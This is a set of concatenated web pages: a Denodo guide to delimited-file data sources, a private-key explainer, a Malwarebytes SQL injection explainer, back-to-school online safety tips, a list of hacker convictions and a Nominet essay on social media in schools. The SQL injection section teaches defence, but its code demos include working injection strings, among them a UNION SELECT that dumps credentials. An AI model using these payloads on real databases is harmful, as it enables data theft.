The main goal of this option is to ignore files that cannot be found, when the data source points to a collection of files and you know some of them may be missing. For example, you can create a DF data source to read a set of log files using a local path built with the ^DateRange function.
See more about “DateRange” in the section Paths Using Date Ranges.
When you query a base view created over this data source, the data source will read all the log files in order. For example, if in the query you put the condition
start_date='2018/05/01' AND end_date = '2018/05/04', the data source will try to read the files “http_access_2018-05-01.log”, “http_access_2018-05-02.log”, “http_access_2018-05-03.log” and “http_access_2018-05-04.log”. If one these files is missing, the query will fail.
If you want to ignore this error, select the check box Ignore route errors. With this option if one of the files does not exist, the data source will skip it and read the next one. If you run the query from the administration tool, you can identify which files could not be read in the Execution trace: in the trace, click on the nodes with Type = Route. The ones that could not be read will have the attribute Exception followed by an error message.
To Process CSV Files
To process a comma-separated values file (a CSV file), select Use column delimiter and, in the box Column delimiter, enter the character that separates the values. Note that the delimiter can be a comma or any other character. If you enter two or more characters, the behavior depends on the check box Delimiter consists of multiple characters:

If it is selected and the delimiter has two or more characters, the values have to be separated by exactly that sequence of characters. For example, if you enter "-|-", the file has to have this structure:

value 1-|-value 2-|-value 3-|-value 4

If it is cleared and the delimiter has two or more characters, each of these characters will be considered a delimiter on its own. For example, if you enter ",|", every time the data source finds a comma (,) or a vertical bar (|), it will consider it the beginning of a new field.
You have to enter the “invisible” characters in a special way. See the table below:
The text qualifier is the double quote (“).
To Process Files With A Complex Structure (Regular Expression)
To process a file with a complex structure that can be represented with a regular expression, select Use tuple pattern and enter a regular expression in Tuple pattern. This is useful for processing log files because they usually have a fixed structure.
This regular expression specifies the format of one row of data within the file. This expression has to match the whole line of the file (or multiple lines), not only the part that you want to capture. The fields of the views created over this data source will be the capturing groups of the regular expression. For example:
(\d\d\d\d)-(\d\d)-(\d\d) - (.*)
The syntax of these regular expressions is the one defined by the Java language (the documentation of the Java class Pattern lists the constructs of these expressions).
The section Examples of How to Define a Tuple Pattern below has several examples of data sources with Tuple Pattern.
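As a quick illustration of how the capturing groups of a tuple pattern become the fields of a base view, the sample expression above can be exercised with Python's re module (whose syntax matches Java's Pattern for this expression); the log line itself is an invented example:

```python
import re

# The four capturing groups -> four fields: year, month, day, message.
tuple_pattern = re.compile(r"(\d\d\d\d)-(\d\d)-(\d\d) - (.*)")

# fullmatch mirrors the requirement that the expression match the
# whole line, not just the part to capture.
m = tuple_pattern.fullmatch("2014-01-31 - user admin logged in")
print(m.groups())  # -> ('2014', '01', '31', 'user admin logged in')
```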
To Process Fixed-Width Files
To process a file in which the values have a fixed-width, select Use fixed length and provide the following values:
Column widths (bytes). Comma-separated list of integers. Each integer is the column size in bytes. E.g. if the file has seven columns, you have to enter 7 integers separated by a comma.
Note this is the width in bytes, not characters. Take this into account when processing files that have multi-byte characters. For example, “例” is a single character but occupies multiple bytes (two in some charsets, three in UTF-8).
Pad character. In fixed-width files, a value is padded, usually with spaces, if it does not use all the bytes allotted to it. If in this file the values are padded with a character other than space, select Use custom value and enter this character. If you enter two or more characters, all of them will be considered pad characters.
Replace character. The character that the data source returns for values that cannot be represented in the specified charset. For most files, you can leave Use default value (whitespace) selected. If you enter a custom value, enter a single character.
This option rarely applies except in situations where the file has an unexpected encoding. Let us say the data source has column width = “1,1” (two columns of one byte each), you selected the encoding “UTF-8”, and when the data source reads the file, the first byte of a value belongs to a multi-byte character. That byte may not correspond to any character on its own, and if this happens, the data source will replace it with a space or with the character you entered.
Alignment. The alignment of the values (left or right) when the values have padding.
End of line delimiter. Character string used to mark the end of a tuple. To indicate the end of line, use \r\n, regardless of the operating system in which Virtual DataPort runs. For fixed-width files, or if there are no end-of-line characters in the file, leave this box empty.
Start of data zone delimiter. Java regular expression identifying the position in the file where the data source has to start retrieving data (or obtaining the header if the Header option is selected). If empty, the search will start at the beginning of the file.
Start delimiter from variable. If selected, the “Start of data zone delimiter” will be considered the name of an interpolation variable that, at runtime, will contain the “Data zone delimiter”.
Include start delimiter as data. If selected, the text matching the “Start of data zone delimiter” expression will be included in the search space.
End of data zone delimiter. The data source will stop retrieving data from the file when it finds this string. If empty, the data source will continue retrieving data until the end of the file.
Include end delimiter as data. If selected, the text matching the “End of data zone delimiter” expression will be considered in the results.
Header. If selected, the data source considers that the first line of the data region contains the names of the fields in this file. These names will be the fields’ names of the base views created from this data source.
Header pattern. Java regular expression used to extract the name of the fields that form the header. This only needs to be specified if the header has a different structure than the data. This option can only be used when the “Header” option is selected.
Ignore matching errors. If selected, the data source will ignore the lines of this data file that do not have the expected structure. I.e. rows that do not have the expected number of columns or, if you are providing a tuple pattern, rows that do not match the pattern.
If you clear this check box, the data source will return an error if there is a row that does not have the expected structure. When you select this check box, you can check if the data source has ignored any row in a query. To do this, execute the query from the Administration Tool. Then, click “View execution trace” and click the “Route” node. You will see the attribute “Number of invalid tuples”.
In the Metadata tab, you can set the folder where the data source will be stored and provide a description.
When editing the data source, you can also change its owner by clicking the button.
Click Save to create the data source.
Then, click Create base view to create a base view associated with the new data source. If the path to the data file includes interpolation variables, you will have to provide a value for them (the section Paths and Other Values with Interpolation Variables explains how to create paths to files with variables).
The Tool will display the schema that the base view will have. At this point, you can change the name of the view and the name and type of its attributes. In the Metadata tab, click Browse to select the folder where the new base view will be stored. Then, click Save.
In the Server Explorer, double-click the new base view to display its schema. Click Edit to open the edition wizard of the view. In this wizard, you can change the name and type of the base view.
Examples of How to Define a Tuple Pattern¶
This section contains two examples of delimited-file data sources that are defined with a Tuple Pattern. Although in these examples we use a static value, the value of Tuple Pattern can be an interpolation variable (see the section Paths and Other Values with Interpolation Variables for more information about interpolation variables).
Example 1 of tuple pattern: Let us say that we have a file that
contains product information in the following format (note that the
discount attribute is optional):
product_name=Acme Laptop Computer;price=1500 euro;discount=50
product_name=Acme Desktop Computer;price=1000 dollar
The following pattern can be used to extract the following information about each product from each row:

Product name

Price and currency

Discount. For the tuples without a discount value, the value of this field will be null.
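One workable tuple pattern for this file is sketched below; it is an assumption for illustration, not necessarily the exact expression from the original manual. The optional fourth capturing group accounts for the missing discount:

```python
import re

pattern = re.compile(
    r"product_name=(.*?);price=(\d+) (\w+)(?:;discount=(\d+))?")

rows = ["product_name=Acme Laptop Computer;price=1500 euro;discount=50",
        "product_name=Acme Desktop Computer;price=1000 dollar"]
parsed = [pattern.fullmatch(r).groups() for r in rows]
print(parsed)
# -> [('Acme Laptop Computer', '1500', 'euro', '50'),
#     ('Acme Desktop Computer', '1000', 'dollar', None)]
```

When the optional group does not participate in the match, its value is None, which corresponds to a null field in the base view.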
Example 2 of tuple pattern: Let us say that we want to extract the name of the files (not directories), their date, and their size from the output of the Windows command dir:
11/07/2007 10:10 <DIR> .dbvis
09/18/2008 15:09 <DIR> .eclipse
01/19/2011 16:55 <DIR> .gimp-2.6
11/10/2009 18:43 215 .ITLMRegistry
03/26/2010 14:16 3.498 .keystore
05/18/2010 17:56 <DIR> .m2
02/02/2010 15:23 <DIR> .maven
03/26/2010 14:01 <DIR> .netbeans
02/02/2011 19:20 <DIR> .smc_cache
06/15/2010 09:59 <DIR> .ssh
10/14/2009 13:26 <DIR> .thumbnails
02/15/2010 12:06 0 .Xauthority
01/16/2008 12:02 517 ant.install.log
02/11/2010 13:29 <DIR> Application Data
07/16/2010 08:51 772 build.properties
02/18/2008 15:19 <DIR> Contacts
01/14/2011 10:02 190 default-soapui-workspace.xml
02/07/2011 11:44 <DIR> Desktop
04/01/2009 15:11 <DIR> Favourites
08/22/2008 12:50 <DIR> Start Menu
01/27/2011 17:18 <DIR> My Documents
02/12/2009 12:36 201 osdadmin.ini
01/14/2011 10:02 7.958 soapui-settings.xml
02/09/2010 10:02 22.358 temp.txt
02/10/2011 09:22 <DIR> Tracing
03/05/2010 09:41 0 vdpws.log
04/17/2009 09:49 <DIR> workspace
The “Tuple pattern” has to be:
The base views created with this tuple pattern will have three fields: the date of the file, its size and its name.
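A candidate expression with those three capturing groups is shown below; since the exact pattern is not reproduced above, this one is an assumption. Directory entries fail to match because “<DIR>” is not a numeric size:

```python
import re

# Groups: date, size, file name. Sizes like "3.498" use a dot as
# thousands separator, hence the [\d.]+ character class.
pattern = re.compile(r"(\d\d/\d\d/\d\d\d\d) +\d\d:\d\d +([\d.]+) +(.*)")

file_line = "11/10/2009 18:43 215 .ITLMRegistry"
dir_line = "11/07/2007 10:10 <DIR> .dbvis"

file_match = pattern.fullmatch(file_line)
dir_match = pattern.fullmatch(dir_line)
print(file_match.groups())  # -> ('11/10/2009', '215', '.ITLMRegistry')
print(dir_match)            # -> None (directories are skipped)
```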
Paths Using Date Ranges¶
When you need access to files that use a date-based naming convention (as is typical in log files), use the ^DateRange function to consider only the files between a given start date and a given end date.
The syntax of the
^DateRange function is the following:
^DateRange ( pattern of the date range : text , start date : text , end date : text , pattern of the files : text )
Pattern of the date range: pattern of the parameters start date and end date. This pattern follows the syntax specified by the class SimpleDateFormat of the Java API.

For example, yyyy-MM-dd is the pattern for <year (4 digits)>-<month in year (2 digits)>-<day in month (2 digits)>. E.g., “2014-01-31”.
This parameter can be a literal or an interpolation variable.
Start date: initial date of the date range. This value has to follow the pattern specified in the first parameter of the function. It can be a literal or an interpolated variable.
End date: finish date of the date range. This value has to follow the pattern specified in the first parameter of the function. It can be a literal or an interpolated variable.
Pattern of the file names: pattern of the file names. This parameter can be a literal or an interpolated variable.
When using this function, follow these two rules:
The literal parameters of the ^DateRange function have to be surrounded by double quotes. With this function you cannot use single quotes.

You cannot leave any space between the parameters of the function.
Let us say that the C:/logs directory contains the log files generated daily by an application. The name of these files follows the pattern application_log_yyyy-MM-dd.log (for example, application_log_2014-01-15.log).

To create a data source that reads all the logs of January 2014, set the path of the data source to the following:
Note that the value of the first parameter (yyyy/MM/dd) is the pattern followed by the start date and end date parameters of the function.
A base view created over this data source will return the data “in order”. That is, the data source reads the first file of the date range, which is the file for the first of January, then the file for the next day, then the day after that, and so on.
At runtime, if one of the files of the date range is missing and the “Ignore route errors” check box is not selected, the query will return an error, but it will also return the contents of all the files it found. For example, if the file application_log_2014-01-15.log does not exist, a query to this data source will return an error message that explains the situation, but the result will contain the data read from all the other files.
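To make the expansion concrete, the following sketch emulates how a yyyy-MM-dd date range turns into an ordered list of file names; the helper function and the file-name template are assumptions, not Denodo internals:

```python
from datetime import date, timedelta

def date_range_files(start, end, template):
    """Yield the file name for each day between two ISO dates, inclusive
    and in order -- roughly what ^DateRange does when reading files."""
    d, stop = date.fromisoformat(start), date.fromisoformat(end)
    while d <= stop:
        yield template.format(d.isoformat())
        d += timedelta(days=1)

files = list(date_range_files("2014-01-01", "2014-01-31",
                              "application_log_{}.log"))
print(files[0], files[-1], len(files))
# -> application_log_2014-01-01.log application_log_2014-01-31.log 31
```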
In the previous example, the date range of the files was fixed and could not be changed at runtime. If you want this range to be dynamic, you can set the start date and end date parameters to be interpolation variables.
The base views created over this data source will have two extra fields, start_date and end_date, whose values will set the date range. For instance, the following query
SELECT * FROM bv_application_log WHERE start_date = '01/01/2014' AND end_date = '03/31/2014'
will make the data source process the log files of the first quarter of 2014.
Note that when a parameter is an interpolation variable, you do not have to add double quotes.
^DateRange can also be used with paths that point to directories
instead of a group of files.
For instance, if the logs of each day are stored in a separate directory with the naming convention yyyyMMdd, set the path of the data source using a ^DateRange expression over the directory names.
A private key (or “secret key”) is a variable that is used with an algorithm for encrypting messages between parties to a private conversation.
In symmetric cryptography, also called secret key cryptography, the same closely-held key is used by both parties to encrypt and decrypt messages. The two share knowledge of the encryption scheme, for example ROT13, and they use this to decipher messages that have had the plaintext rotated 13 characters forward in the alphabet.
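The ROT13 scheme mentioned above can be demonstrated in a few lines of Python; it is, of course, a toy cipher rather than real cryptography:

```python
import codecs

message = "Meet at noon"
ciphertext = codecs.encode(message, "rot_13")   # rotate letters 13 places
plaintext = codecs.decode(ciphertext, "rot_13") # the same rotation reverses it

print(ciphertext)  # -> Zrrg ng abba
print(plaintext)   # -> Meet at noon
```

Because the alphabet has 26 letters, applying the same 13-place rotation twice returns the original text, which is why both parties only need to share the one "key".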
In public-key cryptography (PKC), also called asymmetric cryptography, there are two different but mathematically related keys. The public key is made widely available, while the private key is held only by its owner. The public key is used for encryption and the private key is used for decryption. Simple key distribution makes PKC a sensible system for modern applications since it is scalable, although PKC is more computing-resource-intensive than symmetric cryptosystems.
“In symmetric cryptography, where both users hold the same private key for encryption and decryption, the private key is a closely-held mutual secret. These kinds of systems are fast and efficient; however, distributing keys securely is a challenge that sometimes calls for a key-distribution method different from the encryption scheme used for the actual conversations.”
SQL is short for Structured Query Language and usually pronounced as “sequel.” SQL is a standard language used to query and change the content of databases. It was originally designed to perform business analyses. But with the implementation of product-specific application programming interfaces (API) and the growth of online applications, it quickly became more widely used.
Consider, for example, searching for a certain item in a big online store. What happens behind the scenes is an SQL query on the databases containing products, pricing, and stock. And if you’re logged in as a customer, it might even include some of your preferences.
Example of a SQL query in a webstore
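The caption above refers to a screenshot that did not survive. A hypothetical sketch of such a lookup, using Python's built-in sqlite3 module with invented table and column names:

```python
import sqlite3

# Hypothetical store database; schema and data are invented for illustration.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (name TEXT, price REAL, stock INTEGER)")
db.execute("INSERT INTO products VALUES ('blue widget', 9.99, 42)")

# The search box on the site ultimately turns into a query like this:
search_term = "blue widget"
row = db.execute(
    "SELECT name, price, stock FROM products WHERE name = ?",
    (search_term,),
).fetchone()
print(row)  # ('blue widget', 9.99, 42)
```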
SQL injection can happen when you offer website visitors the option to initiate a SQL query without validating their input. The effects are potentially devastating: SQL injection can destroy your database or give the attacker access to parts of it that you do not want publicly known. Attackers could be after personally identifiable information about your customers or the list of your suppliers.
While the most common use of SQL injection is for web applications, this is certainly not the only type of application that is vulnerable to these attacks. Basically, anything that asks for user input and uses a SQL-based database could be compromised this way without proper validation of the input, regardless of whether the input is stored in the database or initiates a query.
SQL injection is possible when the attacker can apply a code injection technique. These openings are called vulnerabilities because they leave the application open to nefarious SQL statements being inserted into an entry field and executed as commands. To execute a SQL injection, the attacker has to find and exploit a security vulnerability in an application, such as user input that is incorrectly filtered for string literal escape characters. This filtering is what we call validation: the input can be expected to have a certain format and should be rejected or sanitized if it does not match our expectations.
A classic (and greatly exaggerated) example is completely unfiltered PHP code in which the input from the “name” field on a website goes straight into the SQL query. We can’t always see what happens with the result of the query, but often it will be displayed in some form on the site. And with a little bit of trial and error, the attacker could retrieve the administrator's username and change his password just by entering a string of valid SQL commands in the “name” field. That is why we call it SQL injection: an attacker can squeeze in his own strings of code.
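A minimal sketch of the same flaw, using Python's sqlite3 in place of PHP (table names and credentials are invented). The first query pastes user input straight into the SQL string; the second uses a parameterized query, which treats the input as data rather than as SQL:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

# Vulnerable: the "name" field goes straight into the query string.
name = "nobody' OR '1'='1"
query = f"SELECT name, password FROM users WHERE name = '{name}'"
leaked = db.execute(query).fetchall()
print(leaked)  # [('admin', 's3cret')] -- the condition is always true

# Safe: a placeholder keeps the input from being interpreted as SQL.
rows = db.execute(
    "SELECT name, password FROM users WHERE name = ?", (name,)
).fetchall()
print(rows)  # [] -- no user is literally named "nobody' OR '1'='1"
```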
Possible goals of the attack
There are several reasons why an attacker would use SQL injection.
- Destruction: For whatever reason, the attacker wants to put the application or site out of business. You may have seen developers joke about “drop table” when poking fun at SQL-related accidents. The “drop table” command followed by the name of one of the tables in the database deletes that entire table. Rebuilding such a table will be time-consuming, if it is possible at all.
- Stealing information: Data breaches, anyone? The impact to your company is, at a minimum, the loss of trust of your customers and could completely put you out of business.
- Feeding false information: An attacker could improve his own credit standing or lead you to make business decisions based on false information. Either could cost you dearly.
- Taking over control: An attacker that has control over your database may want to feed you false information, deny your access, or remove valuable information.
Knowing what the attackers are after and which methods are used to attack should help you to prevent successful attacks.
For example, a common method to steal passwords is to trick your search results into displaying them. The only thing the attacker needs to do is find submitted variables that are used in SQL statements and passed through unfiltered. Such variables may feed into WHERE, ORDER BY, LIMIT, and OFFSET clauses in select statements. The UNION operator combines the result sets of two or more select statements, so if your database supports this construct, the attacker might try to append an extra query to the original one, a query that could be used to list passwords or usernames. On top of sanitizing input, storing passwords encrypted (or, better, hashed) is another defensive weapon you can use.
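A hedged sketch of such a UNION-based attack, again in Python's sqlite3 (schema and data are invented). The injected fragment must select the same number of columns as the original query:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (name TEXT, price TEXT)")
db.execute("INSERT INTO products VALUES ('widget', '9.99')")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

# The attacker appends a UNION SELECT with matching column count,
# turning a product search into a credential listing. The trailing
# "--" comments out the query's closing quote.
term = "widget' UNION SELECT username, password FROM users --"
query = f"SELECT name, price FROM products WHERE name = '{term}'"
rows = db.execute(query).fetchall()
print(rows)  # both the product row and the stolen credentials come back
```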
Encrypting important data and building some filters to validate the input goes a long way. Obviously, the method of validation depends on the application itself and the coding language. Methods of attack that work in PHP might fail in ASP, for example. Excluding certain characters that are unexpected and/or irrelevant in a text field is a good start.
Is it more important to accommodate the customer who wants to be addressed as Mr. & Mrs. Jones, or to avoid the risk of an attacker happily being able to use the “&&” symbols, a valid operator in many coding languages and some SQL dialects? It doesn’t have to be one or the other, by the way. You can accept the input of such characters as long as you make sure they are dealt with before they are added to the query commands.
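One possible allowlist check in Python. The accepted character set here is an assumption for illustration, and a check like this complements, rather than replaces, parameterized queries:

```python
import re

# Accept letters, digits-free names with spaces, periods, hyphens,
# apostrophes, and ampersands; reject everything else before the value
# ever reaches query-building code.
NAME_OK = re.compile(r"[A-Za-z .'&-]+")

def validate_name(value: str) -> bool:
    return NAME_OK.fullmatch(value) is not None

print(validate_name("Mr. & Mrs. Jones"))       # True
print(validate_name("nobody' OR '1'='1' --"))  # False (digits and '=')
```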
SQL injection is the placement of unauthorized code into SQL statements and is one of the many web attack mechanisms used by hackers to steal data. It is perhaps one of the most common application layer attacks. Knowing what attackers are after and what methods they are using can help you protect your business from these types of attacks. | <urn:uuid:2259be2d-0d4b-48b7-9d05-752796995ea7> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2018/03/explained-sql-injection | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00561.warc.gz | en | 0.941406 | 1,149 | 3.40625 | 3 |
It's that time of year again when parents are slowly gearing up for a new school term. Some schools have a strict policy of only using their own pre-approved lab devices, while others allow students to bring their own devices (BYOD). Whatever the plan, it's never too early to start thinking about some of the potential dangers.
Following the herd
When new schoolmates collide, there's always a mad dash to join the collective and sign up to a bunch of popular websites. I'm sure many parents are intimately familiar with the "I want to set up a YouTube channel because my friend has one" request, followed closely by your own concerns about connected accounts, public-facing settings, and whether or not little Jimmy has uploaded 30 minutes of dabbing in front of the underwear dryer.
Spend some time going over privacy basics, like avoiding recording anything too identifiable. Don't leave letters lying around in shots with home addresses on them, or upload footage of yourself standing outside your house or near well-known public locations.
Digital devices are great tools for education, but there's no harm in admitting they can be a problematic time suck at the worst possible moments. Students love spending time on their mobile phones, tablets, gaming consoles, and computers going down the YouTube rabbit hole or playing their favorite video games. And while videos and games can offer some educational benefits, parents will want to keep an eye on age-appropriateness, time spent in front of the screen, and potential in-game/video purchases that can be easily activated without parental consent.
It isn't just schools in Australia, but schools in the UK, too, who've been sending out letters about the incredibly popular game Fortnite. The letters contain advice on limiting digital playtime via parental controls, as well as password security basics to thwart scammers attempting to pilfer accounts.
Give precedence to digital assignments that must be completed while allowing for some free screen time outside of schoolwork. And make sure to school your children on password-protecting all of their devices for additional security.
A little vanity searching never hurt anyone
It's not enough for your kids to avoid posting their own personally identifiable information online; they should occasionally see what others might be posting about them, too. If a school bully figures out your child's address and posts it online, you'd never know about it unless you heard from a friend.
Smart searching can save the day, and help to get the offending information taken down. This may be something you choose to do yourself rather than burden the child with additional responsibilities.
Security can be fun
You don't need to wait until school time to give your kids some security tips. In fact, it might be more advantageous for them to head into the new school year with some decent computing knowledge, and it'll certainly impress teachers, too.
With education as a top target for cybercriminals, especially those behind dangerous threats such as the Emotet Trojan and ransomware, it's important for parents and students to be aware of the ways they can accidentally help threat actors breach school defenses. We've written a lot about engaging children with infosec, and our post on this subject will be useful whether you're a parent, educator, or both.
Kids and the written word
There are a lot of advice guides out there for parents, and though the books may not be specific to schooling, many of the tips within remain valid. Consider choosing a few titles on the subject of digital literacy, citizenship, or cybersecurity, and brush up your own knowledge on the latest issues affecting kids in cyberspace. Online popularity, social media, and (especially) anything to do with gaming should be your first port of call where learning is concerned...they're all magnets for children and any associated problem points.
Networks and nopeworks
If the school devices are of the fixed, pre-approved types that never leave the classroom, tell your children not to save anything particularly personal to them, outside of whatever schoolwork is required. You don't want a batch of their selfies or bad emo poetry (we've all done it) being stored on some obscure portion of the school network. Even if devices can be brought home, there's a good chance they may have some sort of monitoring and/or logging functionality onboard, so it pays to be cautious and avoid potential trouble further down the line.
The same goes for student-initiated installs on the device. Whether the school has a liberal install policy or the devices are totally on lockdown, it's probably a good idea to always ask whoever is responsible for IT before installing something. The school may have its own internal portal where safe, approved apps live. Randomly grabbing downloads from Google Play, or turning off the "no installs from unknown sources" option could give everybody involved a massive headache.
It isn't just the school that wants to keep an eye on your children's computer use; this may be something you want to do as well. If that's the case, we've written about how you can approach the potentially tricky subject of monitoring with your kids. Remind them: with great power (unfettered access to the Internet) comes great responsibility.
School social networks
Many schools have their own social portals for their students, and they act in a similar way to more well-known services. If your child is on one of these portals, make sure they're using a strong, unique password, and understand the security/privacy settings of the network. As above, they should avoid posting anything too identifiable, and should refrain from cyberbullying their classmates.
On a similar note, some schools will issue devices to students and leave much of the security in the hands of the laptop recipient. If that's the case, we've got you covered with some schooltime 101 security lockdown tips.
Acceptable use policies
A school network without one of these would be a rare thing, so you may wish to request a copy of the AUP and see exactly what can, or can't, be done while using the net on school time. If your child has a habit of, er, breaking the rules, then it might be an idea to talk over any of the most important points. Nobody wants to get kicked out of school over what the child might think is the silliest rule.
Ring the bell!
With our quickfire list of tips and links, both you and yours should be ready to roll when term time comes around. Going back to school can be a grind for older kids, and incredibly daunting for younger ones. Throw some technology into the mix and anything can happen, so it's good to know a wealth of online resources exist for those willing to get their feet wet.
Speaking of, if you'd like even more advice on how to tackle tech and security concerns with your kids, take a look at Malwarebytes' Director of Malware Intelligence Adam Kujawa's live stream on the topic. Hint: Fast forward to about the six minute mark for the video to begin.
Unfortunately, we can't tell you which sofa the school uniform is stuffed down, but we're right here for all your computing-related needs. Wishing you all a productive and safe return to school! | <urn:uuid:79f7ebf1-67be-4e7b-8ff2-516d5bd57fb7> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2018/08/back-to-school-hints-tips-and-links | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00561.warc.gz | en | 0.958417 | 1,499 | 2.671875 | 3 |
Given that computer hacking is at least three decades old, there has been plenty of time for governments to develop and approve cybercrime laws. At the moment, almost all developed countries have some form of anti-hacking law or legislation on data theft or corruption which can be used to prosecute cyber criminals. There are efforts to make these laws even more stringent, which sometimes raise protests from groups which support the right to freedom of information.
Over the past few years, there have been lots of convictions for hacking and unauthorized data access. Here are a few of them:
- Kevin Mitnick is probably one of the most famous hacker takedown cases. Mitnick was arrested by the FBI in Raleigh, North Carolina, on February 15th, 1995, after the computer expert Tsutomu Shimomura managed to track him to his hideout. After pleading guilty to most of the charges brought against him, Mitnick was sentenced to 46 months in prison and three years probation. He was additionally sentenced to another twenty-two months for probation violation and additional charges. He was eventually released from prison on January 21, 2000.
- Pierre-Guy Lavoie, a 22-year-old Canadian hacker, was sentenced to 12 months of community service and placed on probation for 12 months for fraudulently using computer passwords to perpetrate computer crimes. He was sentenced under Canadian law.
- Thomas Michael Whitehead, 38, of Boca Raton, Florida, was the first person to be found guilty under the Digital Millennium Copyright Act (DMCA). He was prosecuted as part of the Attorney General’s Computer Hacking and Intellectual Property program and charged with selling hardware which could be used to illegally receive DirecTV satellite broadcasts.
- Serge Humpich, a 36-year-old engineer, was sentenced to a suspended prison sentence of 10 months by a ruling issued by the 13th correctional chamber. He also had to pay 12,000 francs (approx. €1,200) in fines, and symbolic damages of one franc to the ‘Groupement des Cartes Bancaires’.
- On October 10, 2001, Vasiliy Gorshkov, age 26, of Chelyabinsk, Russia, was found guilty of 20 counts of conspiracy, computer crime, and fraud committed against the Speakeasy Network of Seattle, Washington; Nara Bank of Los Angeles, California; Central National Bank of Waco, Texas; and the online payment company PayPal of Palo Alto, California.
- On July 1, 2003, Oleg Zezev, aka “Alex,” a Kazakhstan citizen, was sentenced in a Manhattan federal court to over four years (51 months) in prison following his conviction on extortion and computer hacking charges.
- Mateias Calin, a Romanian hacker, along with five American citizens, was indicted by a federal grand jury on charges that they conspired to steal more than $10 million in computer equipment from Ingram Micro in Santa Ana, California, the largest technology distributor in the world. Mateias and his network are yet to be convicted for these crimes and face up to 90 years in prison.
- On 27 March 2006, UK couple Ruth & Michael Haephrati, convicted in Israel of developing and selling a Trojan horse program, were sentenced to prison terms of four years and two years respectively (and ordered to pay 2 million Shekels [$428,000] in compensation). They sold their Trojan to private investigators who used it to access data from clients’ business competitors.
- In a well-publicised case, British hacker, Gary McKinnon, awaits extradition to the US for hacking into 97 US military and NASA computers in 2002 – described by one US prosecutor as ‘the biggest military computer hack of all time’. His legal counsel has lodged a series of appeals and (at the time of writing in March 2010) continues to contest the extradition proceedings. If tried and convicted in the US, he faces up to 70 years in prison.
The list above is simply a brief digest which illustrates how cybercrime legislation has been used across the world against hackers or to convict cybercriminals in general. There are also some cases where people have been wrongly convicted of cybercrime. There are also numerous cases where hackers are still at liberty despite their names and identities being known. However, the number of such cases is being reduced day by day.
Cybercrime is here to stay. It is a reality of the 21st century, and the wide availability of the Internet and the insecure systems which come with it have increased the reach of cybercrime. With sufficiently sophisticated legislation, and more international cybercrime treaties being adopted, the world is hopefully heading in the right direction, with the long-term aim being a safer, more law-abiding cyberspace.
Being a teacher has always been a tough job. Taking on the role means accepting responsibility for the potential of young people and embracing the many, various challenges on the path to their future. Time evolves the medium of these challenges, but not the content. The teachers of today still face the issues of bullying and fighting against a tide of inattention in much the same way as their predecessors. In 2017, however, teachers are working against smartphones and the digital world rather than pieces of paper and fisticuffs.
Social media is proving to be one of the areas that causes the most disruption for teachers trying to educate their pupils today. Nominet’s recent research into the impact of social media and the use of smartphones in the classroom found that secondary school teachers lose an average of 17 minutes teaching time every day to disruptions stemming from these – that’s over 11 days each year. This is not only short-changing our kids but each school’s potential too.
The difficulty in handling this growing problem is that the students of today have grown up within a digital world and largely rely on social media to operate within it. Social media platforms offer them a place to express themselves and discover who they are and who they want to be through online exploration and engagement.
The internet also supports their learning. Recent Barnardo’s research found that 75% of 13-15 year olds use the net to help with homework – more than the previous generation. Unfortunately, the study also found that 25% of them had used social media to communicate with a stranger.
Sites such as Twitter, Facebook and Instagram struggle to keep pace with the negative aspects that result from use of their platforms: cyberbullying, online abuse, and the sharing of sexually explicit content. Not only are these issues damaging online for the youngsters, they also leak out from the digital world into the real one. They form the foundation of many of the problems teachers are expected to handle in the classroom.
Another alarming by-product of social media use is the negative way in which it impacts mental health. The NSPCC has established links between social media use and an increase in the likelihood of issues such as anxiety and depression despite the apparent lifeline it offers to adolescents. Our own research concurred, reporting that 57% of all teachers surveyed think social media has negatively affected their students’ mental health. This has serious consequences at a pivotal time in their lives: half of teachers believe social media contributes to their pupils achieving lower grades than their potential. These are just two good reasons why almost three-quarters (72%) of teachers think smartphones should be banned from the classroom completely.
For all the negative associations and issues, social media is here to stay. Young people know no other realm for communication and sharing. They will always find a way of using the online tools, even if schools try to control it. A case in point comes from one of England’s leading independent schools that admitted to monitoring its students’ comments on social media to check for criticism of the school, prompting protests from the students themselves.
To move forward, we need to consider how we make the social media impact positive as far as possible in the school environment. This starts with offering teachers training and support to ensure they feel confident to educate their pupils on social media issues. Teachers must be armed with coping strategies for cyber bullying and impress upon their students the serious consequences of creating or sharing explicit content. We know this is an area that needs work as our research found that almost a quarter of teachers believe they lack the right skills to cope. This is despite 17% of teachers saying they’d experienced pupils sharing explicit or pornographic content in class. In future, schools might need to invest in training or consider hiring qualified staff to manage the challenges associated with social media use and abuse both in and out the classroom.
Coping with existing issues is the first step; the next is knowing how to harness social media for good in a school context. Schools are increasingly using sharing platforms to broadcast updates to parents on everything from school trips to unplanned closures. Within reason, there could also be positive use of platforms in the classroom, with simple steps such as incorporating sites like Facebook into lesson plans. This is great for closed group class projects and sharing relevant research and ideas. There is also evidence, from a study at the University of Kansas, that students learnt a scientific process better than their peers when their learning was supported by social media. That said, teachers must bear in mind the official age restrictions for the social media platforms (13 for Facebook, Instagram and Twitter), even if their students likely don’t.
To support these efforts at school, there needs to be an active interest from Mum and Dad at home too. We found that 84% of the teachers believe they need the help of parents to ensure children understand the risks they take by living online. The best results in this endeavour will come from a collaborative effort; parents, teachers and friends working together to keep our children safe and, hopefully, reduce the negative impact of social media in the classroom.
The challenges of our digital age should be viewed as opportunities and not problems. Social media could become a tool for transformation in the learning environment if everyone works together, upskilling as necessary and investing their efforts in supporting the young people trying to find their way across sharing platforms as they come of age. This is the future generation of leaders and we owe them every chance to make the digital world one which they can navigate safely and thrive within.
For more information on Nominet’s teacher research please visit our website.
Russell Haworth, CEO of Nominet
Image Credit: Syda Productions / Shutterstock
